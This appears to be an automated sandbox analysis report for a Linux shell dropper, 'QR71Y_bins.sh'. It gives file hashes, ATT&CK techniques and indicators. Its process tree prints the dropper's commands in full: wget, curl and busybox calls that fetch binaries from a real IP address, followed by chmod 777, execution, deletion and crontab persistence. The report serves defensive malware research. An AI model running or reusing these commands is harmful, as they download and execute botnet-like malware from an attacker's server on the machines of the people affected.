8d6701b66f6d5e2f19a450e764fd9f305021b2504b7e9ef41c1800ac442549af

Analysis

max time kernel
149s
max time network
151s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
23-11-2024 19:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

QR71Y_bins.sh
Size

10KB
MD5

1af48b59e54a461d801c58a2e6f2853e
SHA1

d8ce0cc7e067bbcc17e7f02651135515cac789e0
SHA256

8d6701b66f6d5e2f19a450e764fd9f305021b2504b7e9ef41c1800ac442549af
SHA512

984eab328dd823233835ab7ec678a632f3ad7671948c58ee5dceba6e0045e15f937a944c47263608dde996c12ab3284cb1230616d9e179db3332f0612c898eab
SSDEEP

96:FhFtmK6NFXTn4C+dwkev3JSIxj4P8wkev3JUIxCI5mK6NFtdf42BhF3Cci:8Tn4C+dwkev3JSKFwkev3J4W

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Contacts a large (1998) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmod

pid process

690 chmod
770 chmod
777 chmod
784 chmod

pid	process
690	chmod
770	chmod
777	chmod
784	chmod

Executes dropped EXE 4 IoCs

Processes:

hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATNh8thNalBVsVsZGzxShbyd3BrADft88FHF5qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t32nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

ioc	pid	process
/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN	691	hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5	771	h8thNalBVsVsZGzxShbyd3BrADft88FHF5
/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3	778	qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1	785	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

Renames itself 1 IoCs

Processes:

2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

pid process

786 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.boIg2a crontab
Enumerates running processes
Discovers information about currently running processes on the system

pid	process
786	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.boIg2a	crontab

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1curl

description	ioc	process
File opened for reading	/proc/836/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/863/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/871/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/19/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/293/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/806/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/327/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/879/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1046/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/292/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/835/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/907/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/895/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/905/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/910/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/949/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1007/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/144/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/235/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/832/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/928/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/589/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/805/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/830/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/865/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/975/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/822/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/824/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/864/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/827/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/958/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/972/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1015/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/14/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/816/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/997/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1005/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/847/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/885/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/964/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/901/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/902/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/968/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1024/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/43/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/861/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/889/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1001/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1035/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/815/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/838/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/965/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/791/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/344/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/609/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/610/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/874/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/929/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/146/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/322/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/814/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/900/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
File opened for reading	/proc/1029/cmdline	2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusyboxbusyboxwgetcurlcurlbusyboxbusyboxcurlwgetwget

description	ioc	process
File opened for modification	/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5	wget
File opened for modification	/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5	curl
File opened for modification	/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5	busybox
File opened for modification	/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3	busybox
File opened for modification	/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1	wget
File opened for modification	/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1	curl
File opened for modification	/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN	curl
File opened for modification	/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN	busybox
File opened for modification	/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1	busybox
File opened for modification	/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3	curl
File opened for modification	/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN	wget
File opened for modification	/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3	wget

/tmp/QR71Y_bins.sh
/tmp/QR71Y_bins.sh
1⤵
PID:655
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:657
- /usr/bin/wget
  wget http://216.126.231.240/bins/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - Writes file to tmp directory
  PID:662
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:684
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - Writes file to tmp directory
  PID:687
- /bin/chmod
  chmod 777 hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - File and Directory Permissions Modification
  PID:690
- /tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  ./hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  - Executes dropped EXE
  PID:691
- /bin/rm
  rm hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN
  2⤵
  PID:694
- /usr/bin/wget
  wget http://216.126.231.240/bins/h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - Writes file to tmp directory
  PID:696
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:709
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - Writes file to tmp directory
  PID:767
- /bin/chmod
  chmod 777 h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - File and Directory Permissions Modification
  PID:770
- /tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  ./h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  - Executes dropped EXE
  PID:771
- /bin/rm
  rm h8thNalBVsVsZGzxShbyd3BrADft88FHF5
  2⤵
  PID:773
- /usr/bin/wget
  wget http://216.126.231.240/bins/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - Writes file to tmp directory
  PID:774
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:775
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - Writes file to tmp directory
  PID:776
- /bin/chmod
  chmod 777 qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - File and Directory Permissions Modification
  PID:777
- /tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  ./qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  - Executes dropped EXE
  PID:778
- /bin/rm
  rm qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3
  2⤵
  PID:780
- /usr/bin/wget
  wget http://216.126.231.240/bins/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - Writes file to tmp directory
  PID:781
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:782
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - Writes file to tmp directory
  PID:783
- /bin/chmod
  chmod 777 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - File and Directory Permissions Modification
  PID:784
- /tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  ./2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:785
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:787
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:788
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:789
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:790
- /bin/rm
  rm 2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1
  2⤵
  PID:792
- /usr/bin/wget
  wget http://216.126.231.240/bins/tVUZen854UwlSjqMByJgMVogO5RprLxy9j
  2⤵
  PID:795

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/2nEVwaGHoBBJcSdWw8X2JbXFUxUn0po6H1

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/h8thNalBVsVsZGzxShbyd3BrADft88FHF5

Filesize
117KB

MD5
849fa04ef88a8e8de32cb2e8538de5fe

SHA1
c768af29fe4b6695fff1541623e8bbd1c6f242f7

SHA256
8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

SHA512
2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

Download Submit
/tmp/hlGl6ZW1KRFLKizQMCfDoe514MxjnZQATN

Filesize
111KB

MD5
ca897a38f23ec23521ce0b1b83f8422d

SHA1
b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

SHA256
043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

SHA512
10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

Download Submit
/tmp/qOZ1xK3KPFobNQsEftXK8hT7NJVguKa9t3

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/var/spool/cron/crontabs/tmp.boIg2a

Filesize
210B

MD5
f70f8b9907a553de4db416cacb7c256e

SHA1
107b0bb8387319cfb131cdcc744aa9871e81ea4f

SHA256
73cab78a9c27847b7ef2e9e1331cb70e17e089d8ec0b6952d13c7e22774e5d74

SHA512
9984732c3630bbcde1756b7ec77652576474269a74c677ede4b2f138be76fabc89dc037951763e5484521618032f4d082fde77065183cc84b79af13158c053f0

Download Submit